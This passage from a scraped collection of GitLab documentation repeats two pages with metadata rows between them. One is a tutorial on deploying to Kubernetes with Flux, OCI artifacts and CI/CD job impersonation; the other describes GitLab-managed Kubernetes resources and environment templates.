environment # We need to select the agent to use - kubectl config use-context $AGENT_KUBECONTEXT script: - kubectl delete secret -n flux-system gitlab-registry-auth environment: name: container-registry-secret action: stop when: manual ``` Before you continue, consider how you might run other commands with CI/CD. ## Build a simple manifest into an OCI image and deploy it to the cluster For production use cases, it is a best practice to use an OCI repository as a caching layer between the Git repository and FluxCD. FluxCD checks for new images in the OCI repository, while GitLab pipeline builds the Flux-compliant OCI images. To learn more about enterprise best practices, see [enterprise considerations](enterprise_considerations.md). In this section, you'll build a simple Kubernetes manifest as an OCI artifact, then deploy it to your cluster. 1. Run the following `flux` CLI commands to tell Flux where to retrieve the specified OCI image and deploy its content. Adjust the `--url` value for your GitLab instance. You can find the container registry URL under **Deploy > Container registry**. You can inspect the created `clusters/testing/nginx.yaml` file to better understand how Flux finds the manifests to deploy. ```shell flux create source oci nginx-example \ --url oci://registry.gitlab.example.org/my-group/optional-subgroup/my-repository/nginx-example \ --tag latest \ --secret-ref gitlab-registry-auth \ --interval 1m \ --namespace flux-system \ --export > clusters/testing/nginx.yaml flux create kustomization nginx-example \ --source OCIRepository/nginx-example \ --path "." \ --prune true \ --target-namespace default \ --interval 1m \ --namespace flux-system \ --export >> clusters/testing/nginx.yaml ``` 1. We'll deploy NGINX as an example. Add the following YAML to `clusters/applications/nginx/nginx.yaml`: ```yaml apiVersion: apps/v1 kind: Deployment metadata: name: nginx-example namespace: default spec: replicas: 1 selector: matchLabels: app: nginx-example template: metadata: labels: app: nginx-example spec: containers: - name: nginx image: nginx:1.25 ports: - containerPort: 80 protocol: TCP --- apiVersion: v1 kind: Service metadata: name: nginx-example namespace: default spec: ports: - port: 80 targetPort: 80 protocol: TCP selector: app: nginx-example ``` 1. Now, let's package the previous YAML into an OCI image. Extend your `.gitlab-ci.yml` file with the following snippet, and again update the `AGENT_KUBECONTEXT` variable: ```yaml nginx-deployment: stage: deploy variables: IMAGE_NAME: nginx-example # Image name to push IMAGE_TAG: latest MANIFEST_PATH: "./clusters/applications/nginx" IMAGE_TITLE: NGINX example # Image title to use in OCI annotation AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing FLUX_OCI_REPO_NAME: nginx-example # Flux OCIRepository to reconcile NAMESPACE: flux-system # Namespace for the OCIRepository resource # This section configures a GitLab environment for the nginx deployment specifically environment: name: applications/nginx kubernetes: agent: $AGENT_KUBECONTEXT namespace: default flux_resource_path: kustomize.toolkit.fluxcd.io/v1/namespaces/flux-system/kustomizations/nginx-example # We will deploy this resource in the next step image: name: "fluxcd/flux-cli:v2.4.0" entrypoint: [""] before_script: - kubectl config use-context $AGENT_KUBECONTEXT script: # This line builds and pushes the OCI container to the GitLab container registry. # You can read more about this command in https://fluxcd.io/flux/cmd/flux_push_artifact/ - flux push artifact oci://${CI_REGISTRY_IMAGE}/${IMAGE_NAME}:${IMAGE_TAG} --source="${CI_REPOSITORY_URL}" --path="${MANIFEST_PATH}" --revision="${CI_COMMIT_SHORT_SHA}" --creds="${CI_REGISTRY_USER}:${CI_REGISTRY_PASSWORD}" --annotations="org.opencontainers.image.url=${CI_PROJECT_URL}" --annotations="org.opencontainers.image.title=${IMAGE_TITLE}" --annotations="com.gitlab.job.id=${CI_JOB_ID}" --annotations="com.gitlab.job.url=${CI_JOB_URL}" # This line triggers an immediate reconciliation of the resource. Otherwise Flux would reconcile following its configured reconciliation period. # You can read more about the various reconcile commands in https://fluxcd.io/flux/cmd/flux_reconcile/ - flux reconcile source oci -n ${NAMESPACE} ${FLUX_OCI_REPO_NAME} ``` 1. Commit and push the changes to your project, and wait for the build pipeline to finish. 1. On the left sidebar, select **Operate > Environments** and check the available [dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md). The `applications/nginx` environment should be healthy. ## Secure the GitLab pipeline access {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} The previously deployed agent is configured using the `.gitlab/agents/testing/config.yaml` file. By default, the configuration enables access to the clusters configured in the project where the GitLab pipelines run. By default, this access uses the deployed agent's service account to run commands against the cluster. This access can be restricted either to a static service account identity or by using the CI/CD job as an identity in the cluster. Finally, regular Kubernetes RBAC can be used to limit the access of the CI/CD jobs in the cluster. In this section, we'll restrict CI/CD access by adding an identity to every CI/CD job, and impersonating the job in the cluster. 1. To configure the CI/CD job impersonation, edit the `.gitlab/agents/testing/config.yaml` file, and add the following snippet to it (replacing `path/to/project`): ```yaml ci_access: projects: - id: my-group/optional-subgroup/my-repository access_as: ci_job: {} ``` 1. As the CI/CD jobs don't have any cluster bindings yet, we can not run any Kubernetes commands from GitLab CI/CD. Let's enable CI/CD jobs to create `Secret` objects in the `flux-system` namespace. Create the `clusters/testing/gitlab-ci-job-secret-write.yaml` file with the following content: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: name: secret-manager namespace: default rules: - apiGroups: [""] resources: ["secrets"] verbs: ["create", "delete"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: gitlab-ci-secrets-binding namespace: default subjects: - kind: Group name: gitlab:ci_job apiGroup: rbac.authorization.k8s.io roleRef: kind: Role name: secret-manager apiGroup: rbac.authorization.k8s.io ``` 1. Let's enable CI/CD jobs to trigger a FluxCD reconciliation too. Create the `clusters/testing/gitlab-ci-job-flux-reconciler.yaml` file with the following content: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: ci-job-admin roleRef: name: flux-edit-flux-system kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:ci_job kind: Group --- apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: ci-job-view roleRef: name: flux-view-flux-system kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:ci_job kind: Group ``` For more information about CI/CD access, see [Using GitLab CI/CD with a Kubernetes cluster](ci_cd_workflow.md). ## Clean up resources To finish, let's remove the deployed resources and delete the secret we used to access the container registry: 1. Delete the `clusters/testing/nginx.yaml` file. Flux will take care of removing the related resources from the cluster. 1. Stop the `container-registry-secret` environment. Stopping the environment will trigger its `on_stop` job, removing the secret from the cluster. ## Next steps You can use the techniques in this tutorial to scale deployments across projects. The OCI image can be built in a different project, and as long as Flux is pointed at the right registry, Flux will retrieve it. This exercise is left for the reader. For more practice, try changing the original Flux `GitRepository` in `/clusters/testing/flux-system/gotk-sync.yaml` to an `OCIRepository`. Finally, see the following resources for more information about Flux and the GitLab integration with Kubernetes: - [Enterprise considerations](enterprise_considerations.md) for the Kubernetes integration - Use the agent for [operational container scanning](vulnerabilities.md) - Use the agent to provide [remote workspaces](../../workspace/_index.md) for your engineers
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Get started deploying to Kubernetes breadcrumbs: - doc - user - clusters - agent --- This page introduces you to deploying to Kubernetes using methods supported by GitLab. In the end, you will understand: - How to deploy with Flux - How to deploy or run commands against your cluster from GitLab CI/CD pipelines - How to combine Flux and GitLab CI/CD for the best outcome ## Before you begin This tutorial builds on the project you created in [Get started connecting a Kubernetes cluster to GitLab](getting_started.md). You'll use the same project you created in that tutorial. However, you can use any project with a connected Kubernetes cluster and a bootstrapped Flux installation. ## Run commands against your cluster from GitLab CI/CD The agent for Kubernetes [integrates with GitLab CI/CD pipelines](ci_cd_workflow.md). You can use CI/CD to run commands like `kubectl apply` and `helm upgrade` against your cluster in a secure and scalable way. In this section, you'll use the GitLab pipeline integration to create a secret in the cluster and use it to access the GitLab container registry. The rest of this tutorial will use the deployed secret. 1. [Create a deploy token](../../project/deploy_tokens/_index.md#create-a-deploy-token) with the `read_registry` scope. 1. Save your deploy token and username as CI/CD variables called `CONTAINER_REGISTRY_ACCESS_TOKEN` and `CONTAINER_REGISTRY_ACCESS_USERNAME`. - For both variables, set the environment to `container-registry-secret*`. - For `CONTAINER_REGISTRY_ACCESS_TOKEN`: - [Mask the variable](../../../ci/variables/_index.md#mask-a-cicd-variable). - [Protect the variable](../../../ci/variables/_index.md#protect-a-cicd-variable). 1. Add the following snippet to your `.gitlab-ci.yml` file, and update both `AGENT_KUBECONTEXT` variables to match your project's path: ```yaml stages: - setup - deploy - stop create-registry-secret: stage: setup image: "portainer/kubectl-shell:latest" variables: AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing before_script: # The available agents are automatically injected into the runner environment # We need to select the agent to use - kubectl config use-context $AGENT_KUBECONTEXT script: - kubectl delete secret gitlab-registry-auth -n flux-system --ignore-not-found - kubectl create secret docker-registry gitlab-registry-auth -n flux-system --docker-password="${CONTAINER_REGISTRY_ACCESS_TOKEN}" --docker-username="${CONTAINER_REGISTRY_ACCESS_USERNAME}" --docker-server="${CI_REGISTRY}" environment: name: container-registry-secret on_stop: delete-registry-secret delete-registry-secret: stage: stop image: "" variables: AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing before_script: # The available agents are automatically injected into the runner environment # We need to select the agent to use - kubectl config use-context $AGENT_KUBECONTEXT script: - kubectl delete secret -n flux-system gitlab-registry-auth environment: name: container-registry-secret action: stop when: manual ``` Before you continue, consider how you might run other commands with CI/CD. ## Build a simple manifest into an OCI image and deploy it to the cluster For production use cases, it is a best practice to use an OCI repository as a caching layer between the Git repository and FluxCD. FluxCD checks for new images in the OCI repository, while GitLab pipeline builds the Flux-compliant OCI images. To learn more about enterprise best practices, see [enterprise considerations](enterprise_considerations.md). In this section, you'll build a simple Kubernetes manifest as an OCI artifact, then deploy it to your cluster. 1. Run the following `flux` CLI commands to tell Flux where to retrieve the specified OCI image and deploy its content. Adjust the `--url` value for your GitLab instance. You can find the container registry URL under **Deploy > Container registry**. You can inspect the created `clusters/testing/nginx.yaml` file to better understand how Flux finds the manifests to deploy. ```shell flux create source oci nginx-example \ --url oci://registry.gitlab.example.org/my-group/optional-subgroup/my-repository/nginx-example \ --tag latest \ --secret-ref gitlab-registry-auth \ --interval 1m \ --namespace flux-system \ --export > clusters/testing/nginx.yaml flux create kustomization nginx-example \ --source OCIRepository/nginx-example \ --path "." \ --prune true \ --target-namespace default \ --interval 1m \ --namespace flux-system \ --export >> clusters/testing/nginx.yaml ``` 1. We'll deploy NGINX as an example. Add the following YAML to `clusters/applications/nginx/nginx.yaml`: ```yaml apiVersion: apps/v1 kind: Deployment metadata: name: nginx-example namespace: default spec: replicas: 1 selector: matchLabels: app: nginx-example template: metadata: labels: app: nginx-example spec: containers: - name: nginx image: nginx:1.25 ports: - containerPort: 80 protocol: TCP --- apiVersion: v1 kind: Service metadata: name: nginx-example namespace: default spec: ports: - port: 80 targetPort: 80 protocol: TCP selector: app: nginx-example ``` 1. Now, let's package the previous YAML into an OCI image. Extend your `.gitlab-ci.yml` file with the following snippet, and again update the `AGENT_KUBECONTEXT` variable: ```yaml nginx-deployment: stage: deploy variables: IMAGE_NAME: nginx-example # Image name to push IMAGE_TAG: latest MANIFEST_PATH: "./clusters/applications/nginx" IMAGE_TITLE: NGINX example # Image title to use in OCI annotation AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing FLUX_OCI_REPO_NAME: nginx-example # Flux OCIRepository to reconcile NAMESPACE: flux-system # Namespace for the OCIRepository resource # This section configures a GitLab environment for the nginx deployment specifically environment: name: applications/nginx kubernetes: agent: $AGENT_KUBECONTEXT namespace: default flux_resource_path: kustomize.toolkit.fluxcd.io/v1/namespaces/flux-system/kustomizations/nginx-example # We will deploy this resource in the next step image: name: "fluxcd/flux-cli:v2.4.0" entrypoint: [""] before_script: - kubectl config use-context $AGENT_KUBECONTEXT script: # This line builds and pushes the OCI container to the GitLab container registry. # You can read more about this command in https://fluxcd.io/flux/cmd/flux_push_artifact/ - flux push artifact oci://${CI_REGISTRY_IMAGE}/${IMAGE_NAME}:${IMAGE_TAG} --source="${CI_REPOSITORY_URL}" --path="${MANIFEST_PATH}" --revision="${CI_COMMIT_SHORT_SHA}" --creds="${CI_REGISTRY_USER}:${CI_REGISTRY_PASSWORD}" --annotations="org.opencontainers.image.url=${CI_PROJECT_URL}" --annotations="org.opencontainers.image.title=${IMAGE_TITLE}" --annotations="com.gitlab.job.id=${CI_JOB_ID}" --annotations="com.gitlab.job.url=${CI_JOB_URL}" # This line triggers an immediate reconciliation of the resource. Otherwise Flux would reconcile following its configured reconciliation period. # You can read more about the various reconcile commands in https://fluxcd.io/flux/cmd/flux_reconcile/ - flux reconcile source oci -n ${NAMESPACE} ${FLUX_OCI_REPO_NAME} ``` 1. Commit and push the changes to your project, and wait for the build pipeline to finish. 1. On the left sidebar, select **Operate > Environments** and check the available [dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md). The `applications/nginx` environment should be healthy. ## Secure the GitLab pipeline access {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} The previously deployed agent is configured using the `.gitlab/agents/testing/config.yaml` file. By default, the configuration enables access to the clusters configured in the project where the GitLab pipelines run. By default, this access uses the deployed agent's service account to run commands against the cluster. This access can be restricted either to a static service account identity or by using the CI/CD job as an identity in the cluster. Finally, regular Kubernetes RBAC can be used to limit the access of the CI/CD jobs in the cluster. In this section, we'll restrict CI/CD access by adding an identity to every CI/CD job, and impersonating the job in the cluster. 1. To configure the CI/CD job impersonation, edit the `.gitlab/agents/testing/config.yaml` file, and add the following snippet to it (replacing `path/to/project`): ```yaml ci_access: projects: - id: my-group/optional-subgroup/my-repository access_as: ci_job: {} ``` 1. As the CI/CD jobs don't have any cluster bindings yet, we can not run any Kubernetes commands from GitLab CI/CD. Let's enable CI/CD jobs to create `Secret` objects in the `flux-system` namespace. Create the `clusters/testing/gitlab-ci-job-secret-write.yaml` file with the following content: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: name: secret-manager namespace: default rules: - apiGroups: [""] resources: ["secrets"] verbs: ["create", "delete"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: gitlab-ci-secrets-binding namespace: default subjects: - kind: Group name: gitlab:ci_job apiGroup: rbac.authorization.k8s.io roleRef: kind: Role name: secret-manager apiGroup: rbac.authorization.k8s.io ``` 1. Let's enable CI/CD jobs to trigger a FluxCD reconciliation too. Create the `clusters/testing/gitlab-ci-job-flux-reconciler.yaml` file with the following content: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: ci-job-admin roleRef: name: flux-edit-flux-system kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:ci_job kind: Group --- apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: ci-job-view roleRef: name: flux-view-flux-system kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:ci_job kind: Group ``` For more information about CI/CD access, see [Using GitLab CI/CD with a Kubernetes cluster](ci_cd_workflow.md). ## Clean up resources To finish, let's remove the deployed resources and delete the secret we used to access the container registry: 1. Delete the `clusters/testing/nginx.yaml` file. Flux will take care of removing the related resources from the cluster. 1. Stop the `container-registry-secret` environment. Stopping the environment will trigger its `on_stop` job, removing the secret from the cluster. ## Next steps You can use the techniques in this tutorial to scale deployments across projects. The OCI image can be built in a different project, and as long as Flux is pointed at the right registry, Flux will retrieve it. This exercise is left for the reader. For more practice, try changing the original Flux `GitRepository` in `/clusters/testing/flux-system/gotk-sync.yaml` to an `OCIRepository`. Finally, see the following resources for more information about Flux and the GitLab integration with Kubernetes: - [Enterprise considerations](enterprise_considerations.md) for the Kubernetes integration - Use the agent for [operational container scanning](vulnerabilities.md) - Use the agent to provide [remote workspaces](../../workspace/_index.md) for your engineers
https://docs.gitlab.com/user/clusters/managed_kubernetes_resources
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/managed_kubernetes_resources.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
managed_kubernetes_resources.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab-managed Kubernetes resources
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16130) in GitLab 17.9 [with a flag](../../../administration/feature_flags/_index.md) named `gitlab_managed_cluster_resources`. Disabled by default. - Feature flag `gitlab_managed_cluster_resources` [removed](https://gitlab.com/gitlab-org/gitlab/-/issues/520042) in GitLab 18.1. {{< /history >}} Use GitLab-managed Kubernetes resources to provision Kubernetes resources with environment templates. An environment template can: - Create namespaces and service accounts automatically for new environments - Manage access permissions through role bindings - Configure other required Kubernetes resources When developers deploy applications, GitLab creates the resources based on the environment template. ## Configure GitLab-managed Kubernetes resources Prerequisites: - You must have a configured [GitLab agent for Kubernetes](install/_index.md). - You have [authorized the agent](ci_cd_workflow.md#authorize-agent-access) to access relevant projects or groups. - (Optional) You have configured [agent impersonation](ci_cd_workflow.md#restrict-project-and-group-access-by-using-impersonation) to prevent privilege escalations. The default environment template assumes you have configured [`ci_job` impersonation](ci_cd_workflow.md#impersonate-the-cicd-job-that-accesses-the-cluster). ### Turn on Kubernetes resource management #### In your agent configuration file To turn on resource management, modify the agent configuration file to include the required permissions: ```yaml ci_access: projects: - id: <your_group/your_project> access_as: ci_job: {} resource_management: enabled: true groups: - id: <your_other_group> access_as: ci_job: {} resource_management: enabled: true ``` #### In your CI/CD jobs To have the agent manage resources for an environment, specify the agent in your deployment job. For example: ```yaml deploy_review: stage: deploy script: - echo "Deploy a review app" environment: name: review/$CI_COMMIT_REF_SLUG kubernetes: agent: path/to/agent/project:agent-name ``` CI/CD variables can be used in the agent path. For more information, see [Where variables can be used](../../../ci/variables/where_variables_can_be_used.md). ### Create environment templates Environment templates define what Kubernetes resources are created, updated, or removed. The [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml) creates a `Namespace` and configures a `RoleBinding` for the CI/CD job. To overwrite the default template, add a template configuration file called `default.yaml` in the agent directory: ```plaintext .gitlab/agents/<agent-name>/environment_templates/default.yaml ``` #### Supported Kubernetes resources The following Kubernetes resources (`kind`) are supported: - `Namespace` - `ServiceAccount` - `RoleBinding` - FluxCD Source Controller objects: - `GitRepository` - `HelmRepository` - `HelmChart` - `Bucket` - `OCIRepository` - FluxCD Kustomize Controller objects: - `Kustomization` - FluxCD Helm Controller objects: - `HelmRelease` - FluxCD Notification Controller objects: - `Alert` - `Provider` - `Receiver` #### Example environment template The following example creates a namespace and grants a group administrator access to a cluster. ```yaml objects: - apiVersion: v1 kind: Namespace metadata: name: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}' - apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: bind-{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }} namespace: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}' subjects: - kind: Group apiGroup: rbac.authorization.k8s.io name: gitlab:project_env:{{ .project.id }}:{{ .environment.slug }} roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: admin # Resource lifecycle configuration apply_resources: on_start # Resources are applied when environment is started/restarted delete_resources: on_stop # Resources are removed when environment is stopped ``` ### Template variables Environment templates support limited variable substitution. The following variables are available: | Category | Variable | Description | Type | Default value when not set | |----------------|-------------------------------|---------------------------|---------|----------------------------| | Agent | `{{ .agent.id }}` | The agent ID. | Integer | N/A | | Agent | `{{ .agent.name }}` | The agent name. | String | N/A | | Agent | `{{ .agent.url }}` | The agent URL. | String | N/A | | Environment | `{{ .environment.id }}` | The environment ID. | Integer | N/A | | Environment | `{{ .environment.name }}` | The environment name. | String | N/A | | Environment | `{{ .environment.slug }}` | The environment slug. | String | N/A | | Environment | `{{ .environment.url }}` | The environment URL. | String | Empty string | | Environment | `{{ .environment.page_url }}` | The environment page URL. | String | N/A | | Environment | `{{ .environment.tier }}` | The environment tier. | String | N/A | | Project | `{{ .project.id }}` | The project ID. | Integer | N/A | | Project | `{{ .project.slug }}` | The project slug. | String | N/A | | Project | `{{ .project.path }}` | The project path. | String | N/A | | Project | `{{ .project.url }}` | The project URL. | String | N/A | | CI/CD Pipeline | `{{ .ci_pipeline.id }}` | The pipeline ID. | Integer | Zero | | CI/CD Job | `{{ .ci_job.id }}` | The CI/CD job ID. | Integer | Zero | | User | `{{ .user.id }}` | The user ID. | Integer | N/A | | User | `{{ .user.username }}` | The username. | String | N/A | All variables should be referenced using the double curly brace syntax, for example: `{{ .project.id }}`. See [`text/template`](https://pkg.go.dev/text/template) documentation for more information on the templating system used. ### Resource lifecycle management {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/507486) in GitLab 18.0. {{< /history >}} Use the following settings to configure when Kubernetes resources should be removed: ```yaml # Never delete resources delete_resources: never # Delete resources when environment is stopped delete_resources: on_stop ``` The default value is `on_stop`, which is specified in the [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml). ### Managed resource labels and annotations The resources created by GitLab use a series of labels and annotations for tracking and troubleshooting purposes. The following labels are defined on every resource created by GitLab. The values are intentionally left empty: - `agent.gitlab.com/id-<agent_id>: ""` - `agent.gitlab.com/project_id-<project_id>: ""` - `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>: ""` - `agent.gitlab.com/environment_slug-<gitlab_environment_slug>: ""` On every resource created by GitLab, an `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>` annotation is defined. The value of the annotation is a JSON object with the following keys: | Key | Description | |-----|--------------------------------------------------| | `environment_id` | The GitLab environment ID. | | `environment_name` | The GitLab environment name. | | `environment_slug` | The GitLab environment slug. | | `environment_url` | The link to the environment. Optional. | | `environment_page_url` | The link to the GitLab environment page. | | `environment_tier` | The GitLab environment deployment tier. | | `agent_id` | The agent ID. | | `agent_name` | The agent name. | | `agent_url` | The agent URL in the agent registration project. | | `project_id` | The GitLab project ID. | | `project_slug` | The GitLab project slug. | | `project_path` | The full GitLab project path. | | `project_url` | The link to the GitLab project. | | `template_name` | The name of the template used. | ## Troubleshooting Any errors related to managed Kubernetes resources can be found on: - The environment page in your GitLab project - The CI/CD job logs when using the feature in pipelines
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab-managed Kubernetes resources breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16130) in GitLab 17.9 [with a flag](../../../administration/feature_flags/_index.md) named `gitlab_managed_cluster_resources`. Disabled by default. - Feature flag `gitlab_managed_cluster_resources` [removed](https://gitlab.com/gitlab-org/gitlab/-/issues/520042) in GitLab 18.1. {{< /history >}} Use GitLab-managed Kubernetes resources to provision Kubernetes resources with environment templates. An environment template can: - Create namespaces and service accounts automatically for new environments - Manage access permissions through role bindings - Configure other required Kubernetes resources When developers deploy applications, GitLab creates the resources based on the environment template. ## Configure GitLab-managed Kubernetes resources Prerequisites: - You must have a configured [GitLab agent for Kubernetes](install/_index.md). - You have [authorized the agent](ci_cd_workflow.md#authorize-agent-access) to access relevant projects or groups. - (Optional) You have configured [agent impersonation](ci_cd_workflow.md#restrict-project-and-group-access-by-using-impersonation) to prevent privilege escalations. The default environment template assumes you have configured [`ci_job` impersonation](ci_cd_workflow.md#impersonate-the-cicd-job-that-accesses-the-cluster). ### Turn on Kubernetes resource management #### In your agent configuration file To turn on resource management, modify the agent configuration file to include the required permissions: ```yaml ci_access: projects: - id: <your_group/your_project> access_as: ci_job: {} resource_management: enabled: true groups: - id: <your_other_group> access_as: ci_job: {} resource_management: enabled: true ``` #### In your CI/CD jobs To have the agent manage resources for an environment, specify the agent in your deployment job. For example: ```yaml deploy_review: stage: deploy script: - echo "Deploy a review app" environment: name: review/$CI_COMMIT_REF_SLUG kubernetes: agent: path/to/agent/project:agent-name ``` CI/CD variables can be used in the agent path. For more information, see [Where variables can be used](../../../ci/variables/where_variables_can_be_used.md). ### Create environment templates Environment templates define what Kubernetes resources are created, updated, or removed. The [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml) creates a `Namespace` and configures a `RoleBinding` for the CI/CD job. To overwrite the default template, add a template configuration file called `default.yaml` in the agent directory: ```plaintext .gitlab/agents/<agent-name>/environment_templates/default.yaml ``` #### Supported Kubernetes resources The following Kubernetes resources (`kind`) are supported: - `Namespace` - `ServiceAccount` - `RoleBinding` - FluxCD Source Controller objects: - `GitRepository` - `HelmRepository` - `HelmChart` - `Bucket` - `OCIRepository` - FluxCD Kustomize Controller objects: - `Kustomization` - FluxCD Helm Controller objects: - `HelmRelease` - FluxCD Notification Controller objects: - `Alert` - `Provider` - `Receiver` #### Example environment template The following example creates a namespace and grants a group administrator access to a cluster. ```yaml objects: - apiVersion: v1 kind: Namespace metadata: name: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}' - apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: bind-{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }} namespace: '{{ .environment.slug }}-{{ .project.id }}-{{ .agent.id }}' subjects: - kind: Group apiGroup: rbac.authorization.k8s.io name: gitlab:project_env:{{ .project.id }}:{{ .environment.slug }} roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: admin # Resource lifecycle configuration apply_resources: on_start # Resources are applied when environment is started/restarted delete_resources: on_stop # Resources are removed when environment is stopped ``` ### Template variables Environment templates support limited variable substitution. The following variables are available: | Category | Variable | Description | Type | Default value when not set | |----------------|-------------------------------|---------------------------|---------|----------------------------| | Agent | `{{ .agent.id }}` | The agent ID. | Integer | N/A | | Agent | `{{ .agent.name }}` | The agent name. | String | N/A | | Agent | `{{ .agent.url }}` | The agent URL. | String | N/A | | Environment | `{{ .environment.id }}` | The environment ID. | Integer | N/A | | Environment | `{{ .environment.name }}` | The environment name. | String | N/A | | Environment | `{{ .environment.slug }}` | The environment slug. | String | N/A | | Environment | `{{ .environment.url }}` | The environment URL. | String | Empty string | | Environment | `{{ .environment.page_url }}` | The environment page URL. | String | N/A | | Environment | `{{ .environment.tier }}` | The environment tier. | String | N/A | | Project | `{{ .project.id }}` | The project ID. | Integer | N/A | | Project | `{{ .project.slug }}` | The project slug. | String | N/A | | Project | `{{ .project.path }}` | The project path. | String | N/A | | Project | `{{ .project.url }}` | The project URL. | String | N/A | | CI/CD Pipeline | `{{ .ci_pipeline.id }}` | The pipeline ID. | Integer | Zero | | CI/CD Job | `{{ .ci_job.id }}` | The CI/CD job ID. | Integer | Zero | | User | `{{ .user.id }}` | The user ID. | Integer | N/A | | User | `{{ .user.username }}` | The username. | String | N/A | All variables should be referenced using the double curly brace syntax, for example: `{{ .project.id }}`. See [`text/template`](https://pkg.go.dev/text/template) documentation for more information on the templating system used. ### Resource lifecycle management {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/507486) in GitLab 18.0. {{< /history >}} Use the following settings to configure when Kubernetes resources should be removed: ```yaml # Never delete resources delete_resources: never # Delete resources when environment is stopped delete_resources: on_stop ``` The default value is `on_stop`, which is specified in the [default environment template](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/managed_resources/server/default_template.yaml). ### Managed resource labels and annotations The resources created by GitLab use a series of labels and annotations for tracking and troubleshooting purposes. The following labels are defined on every resource created by GitLab. The values are intentionally left empty: - `agent.gitlab.com/id-<agent_id>: ""` - `agent.gitlab.com/project_id-<project_id>: ""` - `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>: ""` - `agent.gitlab.com/environment_slug-<gitlab_environment_slug>: ""` On every resource created by GitLab, an `agent.gitlab.com/env-<gitlab_environment_slug>-<project_id>-<agent_id>` annotation is defined. The value of the annotation is a JSON object with the following keys: | Key | Description | |-----|--------------------------------------------------| | `environment_id` | The GitLab environment ID. | | `environment_name` | The GitLab environment name. | | `environment_slug` | The GitLab environment slug. | | `environment_url` | The link to the environment. Optional. | | `environment_page_url` | The link to the GitLab environment page. | | `environment_tier` | The GitLab environment deployment tier. | | `agent_id` | The agent ID. | | `agent_name` | The agent name. | | `agent_url` | The agent URL in the agent registration project. | | `project_id` | The GitLab project ID. | | `project_slug` | The GitLab project slug. | | `project_path` | The full GitLab project path. | | `project_url` | The link to the GitLab project. | | `template_name` | The name of the template used. | ## Troubleshooting Any errors related to managed Kubernetes resources can be found on: - The environment page in your GitLab project - The CI/CD job logs when using the feature in pipelines
https://docs.gitlab.com/user/clusters/user_access
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/user_access.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
user_access.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Grant users Kubernetes access
null
